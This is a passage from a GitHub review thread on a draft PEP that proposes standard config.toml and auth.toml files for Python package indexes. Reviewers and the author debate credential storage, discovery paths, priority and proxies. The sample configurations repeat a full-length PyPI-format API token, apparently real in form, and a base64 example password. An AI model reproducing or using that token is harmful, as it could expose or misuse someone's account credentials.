Draft: Add PEP on package indexes (#2)
fredrikaverpil/peps: pep-9999.rst

==========

Workflow tools come up with their own configuration mechanisms for PyPI repositories, as there is no standard for this. This causes fragmentation and pain points.

Examples of such configuration files:

* Pip's ``pip.conf`` and ``pip.ini``
* Packaging's ``.pypirc`` (also used by tools like Flit and Twine)
* Poetry's ``config.toml`` and ``auth.toml``

Rationale
=========

While this PEP aim to come up with a unified PyPI repository configuration, thought has been given so to be able to extend the configuration later. For example, PyPI repositories are assumed in this PEP, but a ``type`` attribute could be introduced which would default to ``pypi`` down the line, to allow for other package repository types. Any tool could also start taking advantage of the fact that the configuration files and their discovery is a standard, and use this for their own configuration.

Specification
=============

The specification consists of three parts: the configuration definition, package discovery and configuration file discovery.

Configuration definition
------------------------

The configuration is split into two files:

* ``config.toml`` for PyPI repository configuration

> * ``auth.toml`` for credentials

Reviewer: `config.auth.toml` perhaps?

And maybe it'll be easier to define it all as one configuration file and say that tools should read both and override anything in `config.toml` with entries from the other one (similar to how all the other locations are going to have to merge together). Then it's really just a best practice for people to put auth in a separate file, rather than extra code for  tools to have to implement.

Author: I don't quite follow you here. What would the filename `config.auth.toml` solve?

Do you mean that it would be optional to split the data into `config.toml` and `auth.toml` and that a supported case is also to e.g. only put data in the `config.toml`?

Reviewer: Yeah, there's no reason not to support having it all in the one file (plenty of reasons to discourage it, but no good reasons to force tools to write code to enforce it).

Because you want to define a directory, it will likely get used for other types of configuration in the future so that others don't have to define it as well. In that case, you either want to make your names more specific, or follow a convention that's unlikely to lead to conflicts. Renaming to `repositories.toml` and `repositories.auth.toml` would achieve these, or else setting up `auth.toml` in a way that its contents can handle future configuration files without conflicts.

Author: I see what you mean now, but the `config.auth.toml` threw me off a little. 😄 

So, one idea I had was I could write a pypi package which would return the discovered and merged data from this entire PEP. Meaning, the package would just help perform the discovery of the known file locations and then do the deep dict merge and return the end result dict. Like a proof of concept, but also a package the tools can actually use to fetch the data.

In this case, I was also thinking that it could be good to keep the name somewhat arbitrary (e.g. `config.toml` and `auth.toml` so that all of this could be readily consumed by any tool which have the need to store configuration data in the global, local and per-environment way.

So, in a way, I feel I don't want to name the files `repositories.toml` and `repositories.auth.toml`.

But I really like your idea of not assuming you always want to split the data into `config.toml` and `auth.toml`. How about I modify the wording so to explain that all data in `config.toml` and `auth.toml` is merged into the same dictionary and that `auth.toml` is optional. That should solve it, right?

Reviewer: In that case, you probably want to ensure that your `auth.toml` specification includes the `repositories` namespace in its keys (I don't recall whether it did or not, but ISTR that it didn't).

And yeah, I'd just list it in the list of file locations, since it'll merge together just the same as any others. And you can explicitly say that the intention is to be able to separate credentials from URLs.

Author: Makes sense. I updated the draft in a few places so to indicate that `auth.toml` is optional.

The config.toml file
''''''''''''''''''''

Package index configuration is defined in the ``config.toml`` file, under the ``[repositories]`` section::

    [repositories]

    [repostiories.pypi]
    url = "https://pypi.org/simple/"

    [repostiories.myrepo1]
    url = "http://myserver2.org/simple"

A repository has the following attributes::

    ==================  ===========  =============================================
    Attribute           Type         Description
    ==================  ===========  =============================================
    final               bool         Make it impossible to override/remove the repository configuration (default: false)

>     proxy_port          int          The port of the proxy server to use (default: 80)

Reviewer: proxy_url can contain a port.

Author: Good idea!

    proxy_url           str          The URL to the proxy server
    shadow              bool         Use package from this index, even if it was found in a previous index (default: false)
    url                 str          URL to repository
    ==================  ===========  =============================================

The auth.toml file
''''''''''''''''''

Credentials are stored in the ``auth.toml`` file, under the ``[authentication]`` section. There is a correlation between the repository name and the authentication section's name::

    [authentication]

    [authentication.pypi]
    username = "__token__"
    password = "pypi-AgEIcHlwaS5vcmcCJDJjMmI5NDJmLWIzNzQtNDc3ZC04ZmRkLTM4NDEzY2M1ZTU5MAACJXsicGVybWlzc2lvbnMiOiAidXNlciIsICJ2ZXJzaW9uIjogMX0AAAYgV91r8iEUUz7Q5xbsfi_KGiO3wrJR2_IOOpnFyLo62bk"

    [authentication.myrepo1]
    username = "foo"
    password = "YmFyCg=="

> Instead of specifying the credentials in this file, Keyring can be used::

Reviewer: This seems like a requirement applying to tools, rather than part of the specification of the file.

Maybe phrase it as "Tools preferring to look up credentials from other locations, such as `keyring`, are advised to use the full repository URL as the key, rather than the index name or hostname."?

Author: Hmm. I need to look into keyring a bit more, I guess. I haven't used it. But I feel this PEP should be explicit about supporting it. Don't you think so?

So, how would one configure a repository which requires keyring then?
Would they not enter a username and password at all into the repository config, you mean?

Reviewer: In general, tools that support reading from keyring always need a fallback to prompt the user. In that case, they'll write the password back into keyring (if they want, and there's no reason to force that upon them).

So we specify that they should write it back using the full URL, so that provided the user keeps using the full URL all the tools will be looking/setting the same key. That's the best we can do here.

Author: Ok, I used your suggestion for now, worded as-is. 👍

    keyring set https://pypi.org/simple/ __token__
    keyring set <repository URL> <private-repository username>

A repository's credentials has the following attributes::

    ==================  ===========  ===============================================
    Attribute           Type         Description
    ==================  ===========  ===============================================
    cert                str          Path to certificate authority bundle (*.pem)
    cert-client         str          Path to client certificate (*.pem)

>     password            str          The password for the repository, base64-encoded. When token is used, enter it here in clear-text.

Reviewer: "Base 64" seems like an implementation concern. It should probably be plain text, and tools can convert when necessary, unless there's some concern here I haven't thought of (in which case it should be written in the doc - and being able to tell between a token and a password is something I thought of and it can't be solved with this rule ;) )

Author: So the reason for base64 is simply to avoid having people "look over the shoulder" and see the credentials that way.

But I guess you might be right about the token... this could complicate things.

    proxy_password      str          The password for the proxy server, base64-encoded.
    proxy_username      str          The username for the proxy server

>     username            str          The username for the repository. When token is used, set this to ``__token__``.

Reviewer: The username when used with a token is going to vary by service, it won't always be `__token__`. (Also, this note is documentation, not specification.)

>     ==================  ===========  ===============================================

Reviewer: Maybe add an `enabled` property so that it's easy to list-and-disable certain repositories? That makes it easier to handle the "do not include PyPI" case described below, for "later" configs to suppress indexes in earlier configs, and it's easier for UI tools to manage enable/disable sources than to add/remove.

Package discovery
-----------------

The PyPI repository (``repositories.pypi``) does not have to be specified in the ``config.toml``. If not specified, it will be used as the first package index by default. However, by explicitly defining it, the repository attributes can be used and it can be ordered differently.

The order of the repository definitions in ``config.toml`` shall be respected when searching for packages. This allows custom package indexes to take precendence over e.g. a default PyPI repository and the use of package shadowing.

Configuration file discovery
----------------------------

The locations of the configuration files vary slightly across platforms. You may have per-user, per-virtualenv or global (shared amongst all users) configuration:

If multiple configuration files are found, then they are combined (merge and override) in the following order:

1. The global file is read
2. The per-user file is read
3. The virtualenv-specific file is read

> Each file read overrides any values read from previous files.

Reviewer: TOML is implicitly nested dictionaries, I believe, so you may want to define this rule a bit more robustly. A top-level `.update` is going to lose some information, while deep-update may also be complex due to missing keys and default values. There's also the matter of adding more indexes and preserving order, which dictionaries only kind-of do (and you certainly shouldn't assume it in this spec).

Author: Yes, this needs to be defined more explicitly. My thought was a deep merge of the dict.

What you're saying about the ordering... makes me finally want to drop the idea of retaining an order at all. At least not an order the way I've described it in this draft now.

Perhaps a new `order_id` attribute could be introduced, which can be an `int`, if order is important to support.

Reviewer: A `priority` attribute would be fine, and all you have to do is say that it's an int, should be sorted descending, and defaults to zero. That definition is easiest to implement and reason about.

However, I don't think any tools (certainly not pip) are able to apply an ordering to their indexes today, so they'll likely push back on it. So perhaps specify it like:

> Tools SHOULD respect `priority` by acting as if all lower priority repositories were not specified when a higher priority repository satisfies the task. Tools that choose not to respect `priority` MUST display a warning to users when a non-zero priority value is being ignored. It is acceptable for tools to be less efficient in order to handle prioritized repositories, for example, by not performing queries in parallel.

Author: This is great. I would like to take your statement as-is into the draft.

At this point I think I should put your name on the draft as well. Would you mind if I did that?
I mean, so to give credit where credit is due 😄

Reviewer: Go for it, and don't worry about putting my name on it. You can say I've helped review it already, but plenty of people will end up contributing as much as I have.

Author: Ok, I don't have any experience with writing a PEP, but if you keep this up it seems you should be part of the "Authors" in the metadata. :)

Global
''''''

* Unix: ``$HOME/.config/python/``
* macOS: ``$HOME/.config/python/``

> * Windows: ``%APPDATA%\python\``

Reviewer: ```suggestion
* Windows: ``%PROGRAMDATA%\Python``
```

Reviewer: I believe `$HOME` isn't per-machine either for those other platforms. Presumably it belongs under `etc`?

Author: Oops, yes, that is right.

By the way, I chose `%APPDATA%` for Windows only because that's what pip is using for [pip.conf](https://pip.pypa.io/en/stable/user_guide/#searching-for-packages). But I don't know well enough what's the most suitable location here and we can go with `%PROGRAMDATA%` if you think that's more appropriate.

Per-user
''''''''

* Unix: ``$HOME/.config/python/``
* macOS: ``$HOME/.config/python/``

> * Windows: ``%APPDATA%\python\``

Reviewer: ```suggestion
* Windows: ``%APPDATA%\Python\`` (note, this is Roaming app data, not Local)
```

Author: Roaming, meaning it's for all users, right?

Would it be better to store this in `$HOME/.config/python`?
I've seen some applications use the "dot folders" even in Windows. Or this this going too far outside of Windows conventions?

Reviewer: Roaming means that if the user logs into another machine (under some circumstances), the file will automatically roam to the new machine. Putting it into LocalAppData or just under UserProfile (`$HOME` is not a Windows variable) means it will only apply to the current machine.

That said, most people aren't using roaming accounts, so will likely never notice. The Windows Store package has its own roaming space, accessed in the same way, that _will_ roam for most people (including automatic backups, etc.), but without some kind of Python app for updating the file it'll likely never be set.

Author: Great, thanks for the explanation. Committed your change suggestion.

> Per-virtualenv

Reviewer: I prefer "per-environment", and then define it in terms of sys.prefix. That allows for isolated non-virtual environments to contain configuration as well (e.g. a distro could include a file that defaults to their own feed rather than PyPI).

Author: Hm. I just realized one thing.

I think if we are picking between `$VIRTUAL_ENV` vs `sys.prefix` there's no problem going with `sys.prefix`. 

But I just realized, at least I would like to store the `config.toml` inside my git repo, tracked by git/SCM. Meaning, I don't want it placed in my virtual environment. Then I'd store the credentials outside of the git repo.

I wonder what the discovery could be like in this scenario. For example, I usually place a `.venv` folder in the project folder. But a virtual environment could be located anywhere, really. So, I don't want to start making assumptions on _where_ the virtual environment is placed, meaning the discovery cannot be e.g. `$VIRTUAL_ENV/../.python`. Maybe we'd have to settle on `sys.prefix` as that problem becomes too weird to try and solve?

I wonder if the discovery could include `os.getcwdb()` (after `sys.prefix`).

Reviewer: I think in that situation you'll be up against the guys working on the lock file specification, as that is the one that would specify the indexes to pull from. So I doubt you'll have a project-specific configuration, because you'd have a different file with the right settings.

That said, it'll be important to align the two different files so that the lock file (or the lock file _source_ files) can use repository names, rather than full URLs, provided the name is defined in this config. And obviously you'd want to pull auth from a user-specific location.

Site configuration (aka "per environment") is really a special case - most people will never use it. But if you're embedding Python, or distributing a private copy, it becomes essential really quickly. So I'd avoid thinking of it in terms of virtualenv, because that's really not the reason for it. Save that mental energy for making things work with the other spec that's currently in motion.

Author: I wasn't aware of a PEP on lockfile spec was going on. Yes, definitively sounds important to sync/align there.

I updated the draft to say "per-environment" and use `sys.prefix`.

PEP: 9999
Title: Package index configuration standardization
Author: Fredrik Averpil <fredrik at averpil.com>
Status: Draft
Type: Informational
Created: 05-May-2021
Post-History: <dates of postings to python-ideas and/or python-dev>

Abstract
========

This PEP standardizes configuration of PyPI repositories.

Motivation
==========

> Workflow tools come up with their own configuration mechanisms for PyPI repositories, as there is no standard for this. This causes fragmentation and pain points.

Reviewer 2: This is more semantics, but I feel is still relevant. PyPI is not the same as "package indexes" or "repositories" as used by PyPA guide. PyPI often refers to the canonical deployment of [warehouse](https://github.com/pypa/warehouse), which is pypi.org. Making sure the terminology aligns with what PyPA concentionally uses might be good. Further some explicit definition of how these are used within the PEP might not go amiss.

Author: This is really good feedback. I guess I'll have to fix this under both the Abstract and the Motivation in this PEP. Also, I'll stop referring to "PyPI repositories" and maybe instead use the term "Python package repositories".

Author: After digging around a little, I realize that almost all references everywhere in the PyPA and Warehouse documentation refers to "repositories" as GitHub repositories. They pretty much exclusive use the term "Package Index" for, err... well, package indexes. Finally, I found this page: https://packaging.python.org/glossary/#term-package-index

```
Package Index
A repository of distributions with a web interface to automate package discovery and consumption.
```

Which kind of puts the nail in the coffin on using the term "repositories" in the configuration files and in this PEP. I have addressed this in d29137035b23ae448a57521ba0c8d3159150a008. Please let me know what you think.

Examples of such configuration files:

* Pip's ``pip.conf`` and ``pip.ini``
* Packaging's ``.pypirc`` (also used by tools like Flit and Twine)

> * Poetry's ``config.toml`` and ``auth.toml``

Reviewer 2: It is probably important to note that poetry does not use a notion of a global package source. The config file is only pertaining to publish targets. I wanted to raise this, as there is a distinction between what is relevant for pip, poetry and Twine. And there is a distincltion between endpoints and config requred for these.

Reviewer 2: Further, for package sources, we also have to either discount or account for find link use cases as these are commonly used as "repositories". A case that pops up quite often is https://download.pytorch.org/whl/torch_stable.html.

Author: Just like with the Azure/GitLab repo specifics, I would love if you wanted to help draft this, as I lack the insight here. Feel free to edit.

Reviewer 2: I added some words in the abstract. The interesting part here is if we are only dealing "how to connect" this means that irrespective the "type" it always has (or can have)

1. Credentials (username/password) - this might be interesting because "authentication method" can be various even for warehouse cases - token/basic/cert.
2. URL for fetch
3. URL for upload

Author: I'm not sure I follow. I like the idea of defining the scope of the PEP like that; "how to connect" and "the order of index priority".

Rationale
=========

> While this PEP aim to come up with a unified PyPI repository configuration, thought has been given so to be able to extend the configuration later. For example, PyPI repositories are assumed in this PEP, but a ``type`` attribute could be introduced which would default to ``pypi`` down the line, to allow for other package repository types. Any tool could also start taking advantage of the fact that the configuration files and their discovery is a standard, and use this for their own configuration.

Reviewer 2: Important to note that the only types that are expected are `simple` (legacy), `json` and `links`. I do not think authentication varies beyond username/passord with or without client-certificaties. Outside of this the the only real config one might need is a custome cert support.

Author: > @fredrikaverpil added an initial round of thoughts; happy to add some edits over the weekend as well.

Like I mentioned in some replies, would love if you wanted to help out draft this PEP, so feel free to edit away 👍 😄

Specification
=============

The specification consists of three parts: the configuration definition, package discovery and configuration file discovery.

Configuration definition
------------------------

The configuration is split into two files:

* ``config.toml`` for PyPI repository configuration
* ``auth.toml`` for credentials

The config.toml file
''''''''''''''''''''

> Package index configuration is defined in the ``config.toml`` file::

Reviewer 2: Should these be also supported as ENV VARS?

Author: Yeah, I've been thinking of that many times. I mean, why not. All it takes is to settle on the naming of such an environment variable 😉 

The env var should then point to a folder which should contain the `config.toml` and/or `auth.toml` files, I guess.

Author: [Here](https://docs.python.org/3/using/cmdline.html#environment-variables) are all the env vars specified in the official docs.

Seems dangerous to claim e.g. `PYTHONCONFIG`. 😉

Reviewer 2: Maybe claim a prefix? `PYTHONINDEX` or something? Depends on if we defining this for index config alone. If we are we should probably also not recommend `config.toml` as the name :)

Author: So far I think we are open to have other tools make use of this `config.toml` file, in other areas than package index configuration. Because of this, I don't think it's good to limit ourselves here with the choice of the environment variable name 😅 

I assume whatever environment variable name we choose here, it won't end up being added to the official Python documentation (?). Instead I'd assume it would be limited to be specified here in this PEP. And therefore, I don't think we should use a variable name which signals it _could be_ an officially Python-supported env var.

Having all this said, I think it could be good to offer this behavior. I can see how this could be useful in CI situations. And I'd say it should be evaluated last, after the per-project settings. This way, it could override everything stipulated in any of the other file locations and act as the "final verdict" on e.g. whether an index is enabled or not.

Author: @domdfcoding do you have any input on naming for an env var which would point to a path which would hold the `config.toml` and/or `auth.toml`?

I was also thinking this env var would cause configuration detection to be skipped. Meaning, no files which may be placed in the differrent operating system locations specified in this PEP (global, per-user, per-environment) would be read.

Makes sense if this would be something like `$PYTHON_CONFIG_PATH`.

Optionally, another env var could instruct the config detection to use this user-defined `$PYTHON_CONFIG_PATH` at the end of the regular config discovery, so that any config in this path would be added on top of the regular config discovery. For example, we could enable this behavior if the user also specifies `$PYTHON_CONFIG_PATH_ACC` (acc for accumulation).

    [repositories]

>     [repostiories.pypi]
>     url = "https://pypi.org/simple/"
> 

Reviewer 2: ```suggestion
    [[repostiories]]
    name = "pypi"
    url = "https://pypi.org/simple/"

```

Should the name `pypi` should be reserved? I honestly do not feel good about being able to change the url for these.

Reviewer 2: There is also the question of mirrors which has come up a few times.

Reviewer: I feel great about being able to change it ;) (see my comment above)

But it should certainly be discouraged unless someone really knows what they're doing. That's for documentation, and worth noting here, but not something we should forbid in the spec.

Author: > There is also the question of mirrors which has come up a few times.

I would just specify a mirror as another package index (that's what I do with Poetry today). If I wanted to, I could either make it take precedence over PyPI.org (the `priority` attribute) or I could disable PyPI.org alltogether (the `enable` attribute).

How would you want this to work?

> I honestly do not feel good about being able to change the url for these.

The spec would become simpler if we did not address this. But in my opinion, we _could_ reserve the PyPI.org attributes `name` and `url` so that they cannot be modified. I'm just not sure what good that will do, if we allow the `priority` and `enable` attributes on this package index - as then you could re-order or disable PyPI.org anyway.

    [repostiories.myrepo1]
    url = "http://myserver2.org/simple"

    [authentication]

    [authentication.pypi]
    username = "__token__"

>     password = "pypi-AgEIcHlwaS5vcmcCJDJjMmI5NDJmLWIzNzQtNDc3ZC04ZmRkLTM4NDEzY2M1ZTU5MAACJXsicGVybWlzc2lvbnMiOiAidXNlciIsICJ2ZXJzaW9uIjogMX0AAAYgV91r8iEUUz7Q5xbsfi_KGiO3wrJR2_IOOpnFyLo62bk"

Reviewer 2: Does it add much value to separate these out? Why not just be nested tables?

Author: I like that suggestion. I've changed that now. Let me know what you think.

    [authentication.myrepo1]
    username = "foo"
    password = "YmFyCg=="

A repository has the following attributes::

    ==================  ===========  =============================================
    Attribute           Type         Description
    ==================  ===========  =============================================

>     final               bool         Make it impossible to override/remove the repository configuration (default: false)

Reviewer 2: Is this something that has actual value? This can make run time behaviour harder to reason about. Further this can have issues when using PEP 610 based installs. And also causes issues where lock files are relied upon.

Reviewer: Yes, but it should only affect the task of merging multiple configuration files. So there'll be a single (shared) function to "load repository configuration" that will use this, and then tools will consume the result.

It's very useful when you want to (e.g.) replace regular PyPI with an internal cache/mirror on a build machine, because you can set a machine-wide config and mark it `final` to avoid project/user/etc. configs from overriding it. (And then you need to prevent your team from using tool-specific configuration, but that's a people problem that we can't fix in this spec.)

    priority            int          Order of priority, sorted descending (default: 0)

>     proxy_url           str          The URL to the proxy server, can contain a port

Reviewer 2: Would be great if proxy config is a nested table rather than attributes as they themselves.

Author: Sure, why not.

What attributes would such a config have, in your opinion?
Besides `proxy_url` I mean.

Reviewer 2: everything proxy related; credentials and I think in some cases the certs also apply i need to look into that a bit. I am also curious how this interacts with system configuration. Are we implicitly saying that any config here will take precedence over system config? Most cases I have encountered (atleast with enterprise clients) have been interaction with system proxy. Having this configuration required in tool configuration often caused more pain than otherwise. But this might just be me being paranoid as well. :)

Author: > Are we implicitly saying that any config here will take precedence over system config?

I have to say I don't fully understand how a proxy setting would work either. It was brought up in the original discussion thread: https://discuss.python.org/t/adding-a-global-config-to-specify-package-indexes/8599/5

Reviewer 2: >Agreed, I would love to see a standardised format that is used by all tools, for things like package indexes, network settings (proxy, certificates), credentials etc.

So. This is interesting. The comment is a bit ambiguous I'd say. The intent here might be network settings at the same level as package index config. Because, I am not sure if per repo proxy config makes any sense.  I'd say that this makes more sense, meaning cliet tools respect proxy settings if specified - this would require it to ignore system settings and also add support for things like netrc files. Sounds more like a separate PEP tbh.

(scope creep) In the same sense I'd even say that credentials should exist at the same level. And package indexes referring to them by name maybe if hostname is ambigious otherwise do a hostname match?

>     shadow              bool         Use package from this index, even if it was found in a previous index (default: false)

Reviewer 2: Does this offer much value? I am not clear on what scenario this really addresses. Further "shadow" implies "fallback" (to me) and the instructions "Use package from this index" implies this takes priority. Again, this caues fair amount of reasoning issues and can also have concerns around PEP 610 and lock files. Feels like the config is attempting to dictate the behaviour of downstream tools.

Reviewer: I agree, `shadow` doesn't really add anything with `priority`.

Author: I'm not sure what I think about shadowing. Not something I would use personally. It was raised in the [Discourse thread](https://discuss.python.org/t/adding-a-global-config-to-specify-package-indexes/8599/32).

I will remove it. The question is whether we shall put it under "rejected ideas" or not. I will do that for now, with your reasoning behind it @abn.

    url                 str          URL to repository, can contain a port
    ==================  ===========  =============================================

A repository's credentials has the following attributes::

    ==================  ===========  ===============================================
    Attribute           Type         Description
    ==================  ===========  ===============================================
    cert                str          Path to certificate authority bundle (*.pem)
    cert-client         str          Path to client certificate (*.pem)
    enabled             bool         Whether the repository should be used or not (default: true)
    password            str          The password for the repository
    proxy_password      str          The password for the proxy server
    proxy_username      str          The username for the proxy server
    username            str          The username for the repository
    ==================  ===========  ===============================================

> Tools preferring to look up credentials from other locations, such as keyring, are advised to use the full repository URL as the key, rather than the index name or hostname.

Reviewer 2: Should expand here as to why this is important. Since package repos like Azure DevOps and GitLab Artifacts have per repo index urls.

Further the PEP can allow for "hostname" matching to be fallback when a more specific url is not available. Since otherwise, we end up source vs publish end point issues.

Author: As I don't have enought insight here, I would love for you to help writing this. Would you be up for that?

The auth.toml file
''''''''''''''''''

> Optionally, authentication can be defined in a separate ``auth.toml``. This way, credentials can be fully or partially separated from repository URLs.

Reviewer 2: I wonder if this is really necessary? Because we seem to be providing way too many option here. This makes downstream implementation slight more complicated.

Reviewer: That's why it's optional, and it really doesn't need to be treated any differently from the other configuration files, so it's just another step in merging. Perhaps the description can make that clearer?

It's useful for leading people into better workflows, though since none of these files are actually likely to be in a version controlled directory, it's probably not that critical.

Author: @abn My use case would _ideally_ be to specify the `config.toml` contents, but in `pyproject.toml`, in the git repo but keep the credentials out and store them in e.g. the per-user location, in `auth.toml`.

There is no way to _remove_ data from the configuration which has once been defined. However, repositories can be disabled using the ``enable`` attribute.

To do: Python code snippet here to illustrate the exact logic.

Backwards Compatibility
=======================

[Describe potential impact and severity on pre-existing code.]

Security Implications
=====================

[How could a malicious user take advantage of this new feature?]

How to Teach This
=================

[How to teach users, new and experienced, how to apply the PEP to their work.]

Reference Implementation
========================

[Link to any existing implementation and details about its state, e.g. proof-of-concept.]

Rejected Ideas
==============

Base64 encoding for passwords
'''''''''''''''''''''''''''''

Base64 encoding for passwords were considered, to avoid "over the shoulder" peeking.

> However, this complicates being able to tell the difference between a password and a token.

Reviewer 2: I do not think that makes a difference since we can encode a b64 encoded string again. :)  Maybe we should look at maven config for priorart?

Author: Yes, but you can't encode on the fly without a computer, I hope? 😉 
The only use case I had in mind here is really when coding on the commute and similar...

What do you think about this?

Later, I would be interested to hear what everyone thinks on this one, especially when sending this draft to the Discourse thread. I _would_ like to see some sort of protection here, but then the token issue, originally raised by @zooba, would have to be solved.

Reviewer 2: My personal thoughts here is that we should not even store this in a plain text file even when base64 encoded. My preference would be to use something like [fernet](https://cryptography.io/en/latest/fernet/) for users that do not use a keyring. That way the key is requested during decrypting. Painful, but cleaner. 

If we do want to use plain text files and not use fernet, then base64 is probably better. We do not need to make any dynamic distinction between token and password really. I am unclear on why the token issue is an issue.

Order or repositories defined in toml dictates priority
'''''''''''''''''''''''''''''''''''''''''''''''''''''''

The order in which the repositories are defined in ``config.toml`` and/or ``auth.toml`` will not be used as the order of priority in which packages are to be discovered.

> Read configuration files per-virtualenv

Reviewer 2: I wonder if this is something we should consider here at all. The "per-project" overrides are more important and relevant I feel.

Reviewer: Yeah, per-project isn't defined here at all, but that's getting real close to infringing on tools' territory. Per-env is very valuable (you can also see it as "per-install" - think distinguishing between the system install and a custom install of Python).

The other challenge with per-project is it's not in any kind of fixed location. So do we search the current working directory? Some other arbitrary search? Open to ideas here, but maybe the best we can do is hope that tools will copy the format.

Reviewer: Arguably, per-project isn't even the problem we're trying to solve here, because those are inherently unshareable. It's sharing _across_ projects that needs help, and in that case the per-project config should only have the name of the repository, not all the details.

Author: > I wonder if this is something we should consider here at all. The "per-project" overrides are more important and relevant I feel.

This was what I originally wanted to have too. Actually, @zooba and I discussed this briefly in [another thread](https://github.com/fredrikaverpil/peps/pull/2#discussion_r635654650).

> Arguably, per-project isn't even the problem we're trying to solve here, because those are inherently unshareable.

@zooba In which way do you mean a per-project package index config would not be shareable?

I was thinking of how I today specify my custom package index config ([poetry repositories](https://python-poetry.org/docs/repositories/)) in the git repo, in the `pyproject.toml`. That way all users can see which package indexes are required. I personally really want to continue specifying as much as possible of the package index config in the repo (again, not the credentials though). And unless I'm mistaken, Poetry could support this spec and I would place a `config.toml` somewhere in my git repo which Poetry would then use. I would then e.g. place the `auth.toml` in the per-user location. Or would do you (@zooba) mean that this is something the tools should do; extending the spec to e.g. allow to use the same structure in their own config files?

But now that I have both of you here in the same thread, it could be valuable to see if we can figure this out. Especially since you, @abn, is one of the primary maintainers of Poetry 😄

> So do we search the current working directory? Some other arbitrary search? Open to ideas here, but maybe the best we can do is hope that tools will copy the format.

If this spec was adopted and extended by the tools, they would solve that problem.

By the way, @zooba do you know who is working on the PEP/draft on the lockfile spec - or if their draft is public somewhere?

Reviewer 2: > I would place a `config.toml` somewhere in my git repo which Poetry would then use.

We should probably not introduce more files. Wasn't one of the reasons `pyproject.toml` came about because Python project had way too many config files. :smile: 

> That way all users can see which package indexes are required. I personally really want to continue specifying as much as possible of the package index config in the repo (again, not the credentials though).

I have a feeling we need to decouple these use cases. As I commented above, this pep, I feel, should really talk about "how to connect" portion of the puzzle and not what to use. If we say that this is part of the `pyproject.toml`, we can always use named references within the project dependency metadata, atleast for the poetry use case.

The global configuration is more useful for tools like `pip` and not so much for `poetry` as this influences determinism of the dependency resolution. I suspect going forward use cases like mirrors, proxy config, credentials etc. are the things that a project like poetry will care about. But not having gloabl config means this becomes useless for `pip`. But writing this, I wonder if pip and the package metadata should account for this by adding index info (PEP 610 is a step in this direction, I beleive). 

> Yeah, per-project isn't defined here at all, but that's getting real close to infringing on tools' territory. Per-env is very valuable (you can also see it as "per-install" - think distinguishing between the system install and a custom install of Python).

What is challenge the "per-install"/"per-venv" config solving? Most cases I have seen, each environment is defined by the project and the environments are not to be treated as long lived. In these cases, having a per-env config feels like quite a lot of effort. Not against supporting it, but I am curious what value it adds.

As for tools, from a poetry perspective, being able to specify "what index to use for what package" is the main use case. This PEP, I believe, is aiming at configuring the "how to connect" part. With that in mind, I suspect it won't infringe on the tool's responsibility.

Reviewer: > do you know who is working on the PEP/draft on the lockfile spec - or if their draft is public somewhere?

@fredrikaverpil Reach out to Brett Cannon for more info on this. It should be going public soon though, they've been working on it for a while.

> What is challenge the "per-install"/"per-venv" config solving? Most cases I have seen, each environment is defined by the project and the environments are not to be treated as long lived. In these cases, having a per-env config feels like quite a lot of effort.

@abn "Per-install" solves the problem of customised builds distributed within an organisation. Say I have a patched build that my company uses, which requires patched wheels, but people also use a regular Python build for other reasons. With a per-install config, I can include settings that make my custom build default to my custom (internal) index for all tools that fetch/publish packages.

The per-venv side of it is just free, given that, and as you say it isn't that useful. But once you've said "look in `sys.prefix` for a configuration", _excluding_ virtual environments makes it more complicated, not less.

Author: @zooba @abn I reached out to Brett and there's not yet a public version of the PEP draft available on the lockfile. He said they will post it in the `#packaging` discussion over at discuss.python.org when they're done.

Reviewer 3: Maybe tangentially related to the PEP, but I'd love to see some mechanism to "pin" a particular package to a particular repo vice the current unspecified behavior. Something like `@example-private/privatelib` in a requirements file. This could support a couple important use-cases and help to avoid dependency confusion.

thought has been given so to be able to extend the configuration later. For example,
Warehouse [1]_ repositories are assumed in this PEP, but a ``type`` attribute could be
introduced which would default to e.g. ``warehouse`` down the line, to allow for other
package index types. Any tool could also start taking advantage of the fact that the
configuration files and their discovery is a standard, and use this for their own
configuration.

Specification
=============

The specification consists of three parts: the configuration definition, package discovery and configuration file discovery.

Configuration definition
------------------------

The configuration is split into two files:

* ``config.toml`` for Python package index configuration
* ``auth.toml`` for credentials

The config.toml file
''''''''''''''''''''

Package index configuration is defined in the ``config.toml`` file::

    [[package_indexes]]
    name = "pypi"
    url = "https://pypi.org/simple/"

    [[package_indexes]]
    name = "myrepo1"
    url = "http://myserver2.org/simple"

    [[credentials]]
    package_index_name = "pypi"
    username = "__token__"

>     password = "pypi-AgEIcHlwaS5vcmcCJDJjMmI5NDJmLWIzNzQtNDc3ZC04ZmRkLTM4NDEzY2M1ZTU5MAACJXsicGVybWlzc2lvbnMiOiAidXNlciIsICJ2ZXJzaW9uIjogMX0AAAYgV91r8iEUUz7Q5xbsfi_KGiO3wrJR2_IOOpnFyLo62bk"

Reviewer 4: These are upload credentials, right? But how do you map the PEP 508 URL (pypi.org/simple/) to the upload URL (upload.pypi.org/legacy). That'll be different for each repository, if it even supports uploads.

I would have two sections:

1. PEP 508 repositories, and their credentials if required. I'd use the format you have currently.
2. Upload URLs, and their credentials. Almost all uploads with require auth, so I'd have a single table with the name, URL and credentials.

Something like

```toml
[[package_uploads]]
name = "testpypi"
url = "https://test.pypi.org/legacy"
username = "foo"
password = "YmFyCg=="
```

Reviewer 3: Can we please make sure the syntax includes support for environment variables vice having to "hard code" creds into the proposed file? (Other vars could also benefit from env vars, so I'd be fine if any value assignment could reference a env var, but my assumption is this file could/would often be included in version control somehow so we want to avoid spills.)

Reviewer: I forget the details, but there have been Opinions posted about this being supported in distutils/setuptools configuration files. It could probably be used for stealing credentials, but perhaps not in any way that isn't possible anyway.

Maybe add the support with a question mark and see what people say when this reaches public review.

Reviewer 3: I've heard many of those arguments but don't think they hold up under scrutiny. While it's true that env var-based creds can be stolen, they also enable use of automation to create short-lived creds that greatly limit the blast radius of a compromise (using tools like `envconsul` or `summon` to grab creds from a secrets manager and inject them into the execution context). To me that's *vastly* superior to having long-lived creds hard-coded in a config file.

Author: @vadave do you have a suggestion on what this syntax could be like?

Maybe something like...

```toml
    [[package_indexes]]
    name = "testpypi"
    url = "https://test.pypi.org/legacy"

    [[credentials]]
    package_index_name = "testpypi"
    username_env = "MY_USERNAME_ENV"
    password_env = "MY_PASSWORD_ENV"
```

I take it that the env vars take precedence over any already specified `username` or `password` entries to the toml?

Author: > These are upload credentials, right?

@domdfcoding well, not necessarily. They can also be credentials to just grant read-only to e.g. private registries served by e.g. [Artifactory](https://www.jfrog.com/confluence/display/JFROG/PyPI+Repositories).

It has been brought up before, that we will have to separate download vs upload credentials, by e.g. @abn. Also, the download vs upload credentials can differ.

I'm thinking we could do something like this...

```toml
